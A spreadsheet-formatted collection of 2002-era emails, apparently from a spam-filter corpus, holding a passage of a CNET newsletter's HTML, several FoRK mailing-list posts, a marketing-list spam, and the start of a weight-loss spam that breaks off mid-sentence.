 								&amp;#149; 64MB, brilliant TFT screen&lt;BR&gt;
 								&amp;#149; 206MHz Intel processor&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$425&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 									&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 7 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQHBe0irAP_kMFIM559R" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9062023_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1rPdyPTO_Iti64Q9t8uR" &gt;&lt;B&gt;Sony CLIE PEG-NR70V&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Built-in digital camera/MP3 &lt;BR&gt;
 								&amp;#149; Built-in keyboard/color display&lt;BR&gt;
 								&amp;#149; 16MB, Palm OS 4.1&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$517&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 &lt;!-- Product 8 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrsQcK9-pEvKY-qkCKsR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/7344382_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9udMulSkMRUVolYrBZR" &gt;&lt;B&gt;Compaq iPaq H3870 &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Incl. MS Pocket PC 2002&lt;BR&gt;
 								&amp;#149; 64MB, integrated Bluetooth&lt;BR&gt;
 								&amp;#149; 206MHz, 64K color, USB&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$539&lt;/font&gt;&lt;/B&gt;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 empowers you to compare 
 detailed product specifications feature-for-feature? 
 &lt;P&gt;
 Select the items you wish to compare from your customer-
 specific catalog of more than 250,000 SKUs. The product 
 comparison highlights differences between the products 
 in red, allowing your sales reps and customers to easily 
 identify the main differences between each product selected. 
 This comparison can then be e-mailed to your customers to 
 assist them in making a more informed buying decision.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4YT_zaYivwlGWUTnaNtuR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to gain access to the most complete, accurate, 
 and timely product data available. 
  &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtd9bBUwyMWz8AtIQwjjsR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=67-PnDkIOEDqyXwwAeWhKPAKa1CPIPR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWcc3qfpTLfLHDx1984BOnR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyNQDW46rMzb-Byo4hJdcR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBWOWrRttOvAKcnvjbgwRR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7w7qFcaRaT-Dc13yE_FR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8jxS0mE7c7YuNDxuyC9R" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw2t53OMDjnbcumX6cvbuR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iI0PUIytvDA4oSMpoLsR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwJArGHOOPffACEH5fCA9R" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=25-inepIbdXXmz_vxOZTscR7jeQrFuR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8GPoyx7JR1rqAFZcCsR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81v_OSov8g-rrsLKFK0PR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZVnMQsNGWF8w6YrPhnR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9LjQX4wmFz_e0CvgparR" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTCjMntPDuYWD0V_WyRR"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=a4-HGwsr0pzzzXWagl21iBY955q-skPkHdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXmeBp7h8FdMkmoOwzcR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOogLDkn3ufz1Jey2fPRR"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href="http://clickthru.online.com/Click?q=e3-ze2WQkVk8AY_Y82-JM2mPpt29eFR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXnX9bFQDpiaRL6DCwol9R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGY1CohNv0T0QkY6b7uR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_cbyUtuo4I9yc99NcsR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4e51Ed0Q93KjZ6eJcnZR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbkXUVRuAu7hgvo2AKenR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e442&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=62-4oEinrPkUIKKa441thLdJkS2UdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How unlucky can you get?
</t>
  </si>
  <si>
    <t xml:space="preserve">So, last night around 5:30AM I'm woken up by a loud *craaack*, followed by
 one of the most dreaded sounds a homeowner ever hears: vast quantities of
 water spilling onto the floor. The water is coming from the bathroom, the
 toilet specifically. Turns out the water cistern on the top of the toilet
 had cracked down the side, and was spilling out all the water.
 So, after shutting off the water and mopping up, I was left to ponder what
 are the odds of having mechanical failure of a large rectangular porcelain
 bowl, in the absence of any visible stressors (like someone striking it with
 a sledgehammer)? We hadn't done anything unusual to the toilet in the recent
 past -- just normal use. I've *never* heard of this happening to anyone I
 know. The guts, yeah, they fail all the time. But the storage bowl -- never.
 Geesh.
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">unwritten rule.  8-)
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 Sent: Friday, September 06, 2002 10:21 PM
 To: Geege Schuman
 Cc: bitbitch@magnesium.net; Adam L. Beberg; fork@spamassassin.taint.org
 Subject: RE: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 Why should I?  (:
 C
 On Fri, 6 Sep 2002, Geege Schuman wrote:
 &gt; quitcherbraggin.
 &gt;
 &gt; :-)
 &gt; gg
 &gt;
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; Sent: Friday, September 06, 2002 3:42 AM
 &gt; To: bitbitch@magnesium.net
 &gt; Cc: Adam L. Beberg; fork@spamassassin.taint.org
 &gt; Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt;
 &gt;
 &gt; I dunno, BB.  Women who like to be thought of this way should have the
 &gt; right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 &gt; cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 &gt; of hours I do, sometimes more, if he has to catch up with me.  (:  I
 &gt; close him because he is industrious and creative, and because he
 &gt; unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 &gt; here soon to help boy #1 with other things such as pedicures,  backrubs,
 &gt; and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 &gt; have his cake and eat it too, if he can only find the right girl who has
 &gt; the same beliefs about gender  roles that he has. Of course, he has NO
 &gt; clue where to look, so we will be constantly laughing at him while he
 &gt; stumbles around in the dark.
 &gt; Cindy
 &gt; P.S. the numbers do not in any way indicate importance or favor -- only
 &gt; the order in which they move into my house.  -smiles at chris-
 &gt; P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 &gt; driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 &gt; like it normally does.  Wish me luck.  I'm going to look for another
 &gt; computer job.  Le Sigh.  (:
 &gt;
 &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt;
 &gt; &gt; Hello Adam,
 &gt; &gt;
 &gt; &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt; &gt;
 &gt; &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; &gt; so often...  (anyone else want to do the honors?)
 &gt; &gt;
 &gt; &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 &gt; then
 &gt; &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 &gt; she and
 &gt; &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded"
 choices?
 &gt; &gt;
 &gt; &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; &gt; find -love- (which is the crucial distinction between this system) and
 &gt; &gt; they marry one another for the satisfaction of being together.   I
 &gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; &gt; motivator for marrying her, we would not be having this conversation
 &gt; &gt; now.
 &gt; &gt;
 &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; &gt; situations are great, provided everyone is aware that the relationship
 &gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; &gt; marriage.
 &gt; &gt;
 &gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; &gt; blame law school and my cat.
 &gt; &gt;
 &gt; &gt; -BB
 &gt; &gt;
 &gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; &gt; ALB&gt;   beberg@mithral.com
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt;
 &gt; --
 &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 --
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Big Jump
</t>
  </si>
  <si>
    <t xml:space="preserve">Today a French officer called Michel Fournier is supposed to get in a
 350-metre tall helium balloon, ride it up to the edge of space (40 km
 altitude) and jump out.  His fall should last 6.5 minutes and reach
 speeds of Mach 1.5.  He hopes to open his parachute manually at the
 end, although with an automatic backup if he is 7 seconds from the
 ground and still hasn't opened it.
 R
 ObQuote:
   "Veder, si aver si grossi li coglioni, come ha il re di Franza."
   ("Let's see if I've got as much balls as the King of France!")
   - Pope Julius II, 2 January 1511
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/8/02 7:38 AM, "Gary Lawrence Murphy" &lt;garym@canada.com&gt; wrote:
 &gt;   J&gt; ...  If you want a region of the globe mapped out to a very
 &gt;   J&gt; high resolution (e.g. 1-meter), they can scan the area with
 &gt;   J&gt; aircraft LIDAR and add it to the database, thereby making that
 &gt;   J&gt; region zoomable to the resolution of the database for that
 &gt;   J&gt; area.  
 &gt; 
 &gt; Can you give us an example of an application where 1-m resolution
 &gt; would be worth the considerable expense?
 An example:  Being able to model RF propagation in three dimensions for a
 metro area when deploying wireless networks.  By having every single tree
 and building detail and similar, you can "see" even tiny dead spots due to
 physical blockage and signal attenuation.  Overlay this with fiber map data
 for yourself and your competitors (when you can glean such data), which is
 also useful at this resolution, and you have a very slick way of modeling
 existing network deployments in excruciating detail and optimizing further
 deployments to maximize coverage and bandwidth.  Take that and tie it into a
 slick geo-physically aware real-time network monitoring and management
 system and you've really got something...
 For many applications though, 5-meter data is probably adequate.
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $10 a hour for watching e-mmercials! No joke!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Answer-Us&lt;/title&gt;
 &lt;/head&gt;
 &lt;body link="#FF0000" vlink="#333399" alink="#333399"&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="4" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#425074" width="586" id="AutoNumber1" height="300"&gt;
     &lt;tr&gt;
       &lt;td width="627"&gt;
       &lt;p align="center"&gt;
       &lt;font face="Arial"&gt;&lt;br&gt;
       &lt;a href="http://www.answer-us.com/emails/answer-us/redirect.htm"&gt;
       &lt;img border="0" src="http://www.answer-us.com/emails/answer-us/email.jpg" width="440" height="390"&gt;&lt;/a&gt;&lt;/p&gt;
       &lt;hr width="600" color="#425074" noShade&gt;
 &lt;CENTER&gt;
     &lt;table border="1" cellpadding="0" cellspacing="0" style="BORDER-COLLAPSE: collapse" bordercolor="#ffffff" width="90%"&gt;
       &lt;tr&gt;
         &lt;td width="100%"&gt;
         &lt;p align="center"&gt;&lt;u&gt;
 		&lt;font face="Arial" size="2" color="#D76F3A"&gt;&lt;b&gt;Unlist Information&lt;/b&gt; &lt;/font&gt;
         &lt;/u&gt;&lt;/p&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
 &lt;/CENTER&gt;
 &lt;CENTER&gt;
     &lt;table border="1" cellpadding="0" cellspacing="0" style="BORDER-COLLAPSE: collapse" bordercolor="#ffffff" width="78%" height="105"&gt;
       &lt;tr&gt;
         &lt;td width="100%" height="105"&gt;
         &lt;font face=Arial size="1" color="#304D71"&gt;
 		This message is brought to you by Answer-us.com in 
 		compliance with current federal laws. To find out more about Answer-us.com visit
         &lt;/font&gt;
         &lt;font color="#304D71" size="1"&gt;
         &lt;a target="newwin" href="http://www.answer-us.com/new"&gt;
         &lt;font color="#D76F3A"&gt;
         &lt;a href="http://www.answer-us.com/emails/answer-us/redirect.htm"&gt;
         &lt;font color="#D76F3A"&gt;http://www.answer-us.com&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font color="#304D71"&gt;&lt;font face=Arial size="1"&gt;. 
         You are receiving this mailing because you or someone you know has 
         registered this email address to receive special offers from an Answer-us.com 
         marketing partner. Screening of addresses has been done to the best of 
         our knowledge. We honor all unlist requests within 72 hours. If you
         have received this email in error, we apologize for any inconvenience it 
         has caused and will not mail further offers to you. To be
         unlisted from our database, please do the 
         following: Simply&lt;/font&gt;&lt;font size="1"&gt; &lt;/font&gt; &lt;/font&gt;
         &lt;b&gt;&lt;a href="http://www.answer-us.com/Unsubscribe.html"&gt;
         &lt;font size="2" color="#304D71"&gt;
         &lt;/font&gt;
         &lt;font size="2" color="#304D71"&gt;
         &lt;a href="http://www.answer-us.com/emails/answer-us/redirect2.htm"&gt;
         &lt;font color="#D76F3A"&gt;click here&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/a&gt;&lt;font size="2" color="#D76F3A"&gt;
         &lt;/font&gt;
         &lt;/b&gt;
         &lt;font face=Arial size="1" color="#304D71"&gt;
         . If you have your mail forwarded to a new email address 
         please provide your old email address.
         &lt;/font&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
 &lt;/CENTER&gt;
 &lt;CENTER&gt; 
     &lt;hr width="600" color="#425074" noShade&gt;
 &lt;/CENTER&gt;
 &lt;CENTER&gt;
     &lt;table cellSpacing="0" cellPadding="0" width="602" border="0" style="BORDER-COLLAPSE: collapse" bordercolor="#111111" height="103"&gt;
       &lt;tr&gt;
         &lt;td width="166" bgColor="white" height="91" border="0"&gt;
         &amp;nbsp;
         &lt;/font&gt;
       &lt;font face="Verdana"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="161" border="2" bordercolor="#32336B" style="BORDER-COLLAPSE: collapse" height="84"&gt;
           &lt;tr&gt;
             &lt;td width="157" bgColor="white" height="84" border="0"&gt;
             &lt;p align="center"&gt;&lt;font color="#D76F3A" size="6"&gt;A&lt;/font&gt;&lt;font color="#D76F3A" size="4"&gt;nswer&lt;/font&gt;&lt;font color="#32336B" size="4"&gt;-&lt;/font&gt;&lt;font color="#D76F3A" size="4"&gt;Us&lt;/font&gt;&lt;b&gt;&lt;font color="#425074" size="5"&gt;&lt;br&gt;
             &lt;/font&gt;&lt;font color="#425074"&gt;Nationwide&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;/font&gt;
       &lt;font face="Arial"&gt;
             &lt;p align="center"&gt;
             &lt;b&gt;
             &lt;font face="Arial, Helvetica, sans-serif" color="#00008b" size="1"&gt;
             &lt;A href="mailto:support@answer-us.com"&gt;&lt;font color="#D76F3A"&gt;support@answer-us.com&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;font color="#D76F3A"&gt;&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
         &lt;td width="8" bgColor="white" height="91"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;td width="428" bgColor="white" height="91"&gt;
         &lt;p align="center"&gt;
         &lt;i&gt;
         &lt;font face="arial,helvetica" color="#00008b" size="1"&gt;
         &lt;br&gt;
         &lt;/font&gt;
       &lt;font face="Arial,Helvetica,Helvetica" color="#323460" size="2"&gt;Our 
         E-Mail Campaigns Have Produced
       Staggering Response Rates!&lt;/font&gt;&lt;font face="Arial,Helvetica,Helvetica" color="darkblue" size="2"&gt;&lt;br&gt;
         &lt;/font&gt;
         &lt;font face="Arial,Helvetica" color="#D76F3A"&gt;&lt;big&gt;&lt;big&gt;&lt;font size="2"&gt;Responsive 
       General or Targeted Managed&lt;/font&gt;&lt;nobr&gt;&lt;font size="2"&gt; E-Mail Lists&lt;/font&gt;&lt;/nobr&gt;&lt;/big&gt;&lt;/big&gt;&lt;/font&gt;&lt;font size="2"&gt;&lt;font color="#D76F3A"&gt;
       &lt;/font&gt;
         &lt;font color="#ff7c3e"&gt;
         &lt;br&gt;
       &lt;/font&gt;
         &lt;/font&gt;
         &lt;font face="Arial" size="2"&gt;&lt;font color="#425074"&gt;
       Visit&lt;/font&gt;&lt;font color="#00008b"&gt;&lt;a href="http://www.answer-us.com/emails/answer-us/redirect.htm"&gt;
         &lt;font color="#D76F3A"&gt;
       &lt;b&gt;
         www.answer-us.com&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;b&gt;&lt;font color="#D76F3A"&gt;
         &lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;font color="#425074"&gt;today!&lt;/font&gt;&lt;/font&gt;&lt;font face="arial,helvetica" color="#425074" size="1"&gt;
         &lt;/font&gt;&lt;/i&gt;&lt;/p&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
 &lt;/CENTER&gt;
 &lt;CENTER&gt;
     &lt;table cellSpacing="0" cellPadding="0" width="603" border="2" style="BORDER-COLLAPSE: collapse" bordercolor="#32336B" height="10"&gt;
       &lt;tr&gt;
         &lt;td width="603" bgColor="#D76F3A" height="12" border="0"&gt;
         &lt;p align="center"&gt;
         &lt;b&gt;
         &lt;font face="verdana,arial,helvetica" color="#FFFFFF" size="1"&gt;Copyright 
          2002 Answer-us.com. All rights reserved. &lt;/font&gt;
         &lt;/b&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
 &lt;/CENTER&gt;&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] can't write to CVS...
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Skip&gt; I'll try a checkout into a new directory...
 Which didn't help.  At the very least I think that means it's time for
 bed...
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Weight Loss Secrets Of Doctors And Famous Stars!!.....
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;FONT PTSIZE=10 FAMILY="SANSSERIF" LANG="0"&gt;Dear Friend,&lt;BR&gt;
 &lt;BR&gt;
 This last summer, our family had a big reunion at a fabulous resort in 
 Minnesota. &amp;nbsp;The water was sapphire blue and the evergreens sang as the 
 breeze rustled their limbs. &amp;nbsp;We had such a great time renewing old 
 friendships, seeing how everyone's children had grown, and catching up on 
 everyone's lives. &amp;nbsp;The last day we had a family picture taken, thinking 
 that we'd all send them out as our Christmas cards.&lt;BR&gt;
 &lt;BR&gt;
 In October we got the proofs back so that we could pick our favorite picture. 
 Everybody looked wonderful and the background was spectacular but I could not 
 find myself in the picture. &amp;nbsp;I looked and looked and finally got out a 
 magnifying glass. &amp;nbsp;To my horror, I found this dark curly headed woman 
 with a face that looked like a stretched moon!!! &amp;nbsp;Dear God it was me!!! 
 &amp;nbsp;My body resembled an inflated hot air balloon that would take off should 
 a heavy wind arise... it was &lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;&lt;B&gt;HIDEOUS&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;! &amp;nbsp;I had mirrors in my house but most of them were 
 designed to only reflect &amp;nbsp;from the waist up and I honestly hadn't noticed 
 that my cheekbones had totally disappeared and that my face looked like a 
 shapeless clump of flesh. &amp;nbsp;I was always so happy that I didn't have a lot 
 of wrinkles, &amp;nbsp;but I didn't realize that I wasn't wrinkled because my skin 
 was as stretched as tight as a bongo drum.&lt;BR&gt;
 &lt;BR&gt;
 Well, this situation was &lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;&lt;B&gt;NOT&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;&lt;/B&gt; &lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt; acceptable. &amp;nbsp;But I was at a loss as to what to do. 
 &amp;nbsp;My willpower, well, basically sucks and I had so-o-o much weight to lose 
 that I wasn't sure I'd live long enough to get it all off. &amp;nbsp;Plus, I hate 
 diets and can only stick to them for a very short period of time before I fall 
 off the food wagon. &amp;nbsp;My goal to slim down seemed totally hopeless.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#ffffff" style="BACKGROUND-COLOR: 
 #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;AND THEN 
 IT HAPPENED&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;. &amp;nbsp;I received a brochure about a product called 
